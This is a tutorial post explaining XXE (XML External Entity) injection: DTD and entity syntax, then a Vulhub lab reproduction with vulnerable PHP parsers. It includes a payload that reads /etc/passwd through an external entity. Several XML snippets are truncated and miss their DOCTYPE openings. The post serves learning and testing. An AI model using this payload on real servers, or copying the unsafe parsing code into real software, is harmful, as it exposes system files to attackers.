Understanding XXE Vulnerabilities: Risks and Exploitation Techniques in XML Input Parsing

XXE stands for XML External Entity, which refers to an XML External Entity Injection attack. The XXE vulnerability occurs when an application parses XML input without disabling the loading of external entities, allowing malicious external files to be loaded. This can lead to file reading, command execution, internal network port scanning, attacks on internal websites, and even DoS attacks. The XXE vulnerability poses significant risks, though it seems less common nowadays since many programming languages now disable external entity loading by default. However, understanding XXE and its exploitation techniques is still very useful from a learning perspective.

XML input

Typically, attackers inject payloads into XML files. Once the file is executed, it can read local files on the server and initiate access to scan internal network ports. In other words, XXE is a method to access various services from a local system. Speaking of XML, we must mention DTD. DTD stands for Document Type Definition, which defines the building blocks of a valid XML document. It uses a set of legal elements to define the structure of a document. DTD can be declared inline within an XML document or referenced as an external file. With a DTD document, independent applications can exchange and process data with minimal interaction. An application can also use a DTD to validate that the data it receives conforms to the expected structure.

Internal DTD Declaration:

 

External DTD Reference:

 

Some important keywords in DTD documents include:

DOCTYPE (Declaration of DTD)

ENTITY (Declaration of Entities)

SYSTEM, PUBLIC (External Resource Requests)

What is an entity? Entities can be understood as variables that must be declared in the DTD and can be referenced elsewhere in the document. Entities are mainly divided into four types:

Built-in Entities, Character Entities, General Entities, and Parameter Entities.

Parameter entities are declared using `%EntityName` and referenced with `%EntityName;`. Other entities are declared using `EntityName` and referenced with `&EntityName;`. Parameter entities can only be declared and referenced within the DTD, while other entities can be declared in the DTD and referenced in the XML document.

Internal Entity:

<!ENTITY EntityName “EntityValue”>

External Entity:

<!ENTITY EntityName SYSTEM “URI”>

Parameter Entity:

<!ENTITY % EntityName “EntityValue”> or <!ENTITY % EntityName SYSTEM “URI”>

Non-parameter entities + Internal Entity:

]>&name;

Parameter Entity + External Entity:

%name;]>

%name (parameter entity) is referenced in the DTD, while &name (other entities) is referenced in the XML document. Since the XXE vulnerability mainly exploits the use of external entities in DTD, let’s focus on the types of external entities that can be referenced.

External entities are used in the DTD to reference external resources rather than internal entities. XML inputThis diagram has been seen many times, showing common types like file, http, https, ftp, etc. Different programs support different types. Let’s use the vulnerability environment provided by Vulhub to reproduce the vulnerability. First, let’s look at the code for `SimpleXMLElement.php`:

<?php
$data=file_get_contents('php://input');$xml=new SimpleXMLElement($data);echo$xml->name;

Data is received via POST, an XML object is instantiated, and the name is echoed, which is a reflected XXE. The payload is executed directly:



<!ENTITY xxe SYSTEM “file:///etc/passwd” >]>

&xxe;

The `/etc/passwd` file was successfully read. Next, let’s look at the code for `dom.php`:

<?php
$data=file_get_contents('php://input');$dom=new DOMDocument();$dom->loadXML($data);print_r($dom);

Here, `DOMDocument` is used to parse XML, but the principle is similar. The same payload is used, but the output format differs slightly. Similarly, `simplexml_load_string.php` works the same way, so screenshots are omitted. Since the payloads above target reflected XXE, I will analyze blind XXE exploitation in another article.